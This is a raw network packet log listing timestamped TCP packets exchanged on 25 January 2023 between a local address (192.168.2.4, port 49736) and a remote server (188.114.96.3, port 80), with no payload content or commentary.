Jan 25, 2023 09:28:12.835053921 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835068941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835129023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835306883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835366964 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835371971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835427999 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835436106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835500956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835561037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835616112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835639954 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835666895 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835683107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835747957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835813046 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835867882 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835876942 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.835930109 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.835942030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836004019 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836055994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.836064100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836128950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836194992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836196899 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.836256981 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836319923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836335897 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.836380005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836433887 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836500883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836565971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836628914 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836637974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.836692095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836714983 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.836755991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836878061 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.836895943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.836957932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837018013 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.837022066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837085962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837147951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837212086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837275028 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837311029 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.837338924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837398052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837457895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837462902 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.837516069 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.837522030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837584972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837644100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837707996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837718964 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.837765932 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.837769032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837831974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837886095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837949038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.837949991 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838007927 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838011026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838076115 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838138103 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838202000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838203907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838262081 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838268995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838331938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838392973 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838452101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838459015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838505983 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838516951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838578939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838639975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838716984 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838732004 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838790894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838795900 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838852882 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838917971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.838974953 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.838978052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839032888 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839040995 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839103937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839168072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839194059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839237928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839293957 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839349031 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839359045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839413881 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839421034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839484930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839545965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839602947 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839607954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839660883 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839670897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839730978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839797020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839854002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839858055 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839915037 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.839917898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.839981079 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840043068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840101004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840105057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840162039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840167999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840234041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840296030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840352058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840357065 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840415955 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840419054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840482950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840547085 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840606928 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840609074 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840662003 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840670109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840734005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840795994 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840851068 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840857029 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840919971 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.840920925 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.840985060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841046095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841101885 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841104984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841159105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841167927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841233015 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841291904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841348886 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841357946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841415882 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841418982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841485023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841545105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841552019 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841608047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841660023 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841670990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841737032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841799974 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841855049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841861963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841918945 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.841922998 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.841989040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842048883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842108965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842108965 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842166901 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842175007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842240095 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842303991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842360973 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842366934 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842425108 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842431068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842494011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842570066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842633009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842634916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842705011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842725039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842787027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842850924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842911959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842911959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.842967987 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.842978001 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843039989 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843097925 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843101025 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843162060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843230009 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843302965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843310118 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843358994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843365908 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843429089 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843496084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843554974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843559027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843617916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843622923 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843686104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843746901 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843806028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843806982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843859911 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.843871117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843930006 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.843992949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844049931 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844058037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844113111 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844119072 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844187021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844248056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844305992 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844309092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844363928 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844372988 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844435930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844497919 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844559908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844562054 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844608068 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844628096 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844631910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844660044 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844685078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844711065 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844713926 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844738960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844746113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844768047 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844789982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844793081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844821930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844846010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844871998 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844876051 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844898939 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844903946 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.844927073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844953060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844976902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.844979048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845004082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845010042 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845031023 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845055103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845057011 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845084906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845109940 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845134020 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845135927 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845158100 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845165014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845191956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845217943 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845242977 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845243931 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845267057 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845272064 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845299959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845325947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845350027 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845350981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845371008 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845377922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845405102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845429897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845453978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845455885 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845478058 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845483065 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845510960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845623016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845644951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845663071 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845673084 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845683098 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845701933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845726967 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845730066 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845752954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845778942 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845803976 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.845828056 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.845834970 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863085985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863123894 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863162041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863300085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863300085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863831043 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863852024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863878012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863903999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863907099 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863909960 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863929987 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863936901 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863954067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863977909 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.863979101 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.863992929 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864003897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864020109 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864028931 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864037037 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864054918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864065886 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864078999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864087105 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864104033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864115000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864129066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864134073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864154100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864166021 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864178896 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864182949 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864203930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864212036 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864228964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864234924 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864253998 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864264011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864279032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864283085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864315033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864326954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864341974 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864370108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864406109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864432096 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864438057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864460945 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864470959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864497900 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864506960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864526987 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:12.864537954 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:12.864564896 CET	49736	80	192.168.2.4	188.114.96.3
